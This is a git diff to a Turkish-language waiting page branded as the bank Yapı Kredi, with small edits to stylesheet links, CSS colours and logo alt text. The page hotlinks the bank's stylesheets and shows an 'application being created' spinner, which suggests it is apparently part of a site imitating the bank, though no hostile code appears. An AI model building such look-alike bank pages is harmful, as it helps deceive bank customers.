--- a/bekle.html
+++ b/bekle.html
@@ -4,8 +4,8 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Yapı Kredi</title>
-    <link rel="stylesheet" href="https://https://internetsube.yapikredi.com.tr//ngi-static/css/source/fonts.css">
-    <link rel="stylesheet" href="https://https://internetsube.yapikredi.com.tr//ngi-static/css/main.ui.min.css">
+    <link rel="stylesheet" href="https://www.yapikredi.com.tr//ngi-static/css/source/fonts.css">
+    <link rel="stylesheet" href="https://www.yapikredi.com.tr//ngi-static/css/main.ui.min.css">
     <link rel="stylesheet" href="main.css">
     <style>
         body {
@@ -15,8 +15,6 @@
             justify-content: center;
             align-items: center;
             font-family: Arial, sans-serif;
-            background: #ffffff; /* Arka plan tamamen beyaz */
-            color: #000; /* Yazılar siyah */
         }
         .container {
             text-align: center;
@@ -46,7 +44,7 @@
 <body>
     <div class="container">
         <div class="logo">
-            <img src="./logo.png" alt="Yapı Kredi">
+            <img src="./logo.png" alt="Yapı Kredi Logo">
         </div>
         <div class="loading-message">Başvurunuz Oluşturuluyor Lütfen Bekleyiniz...</div>
         <div class="spinner"></div>
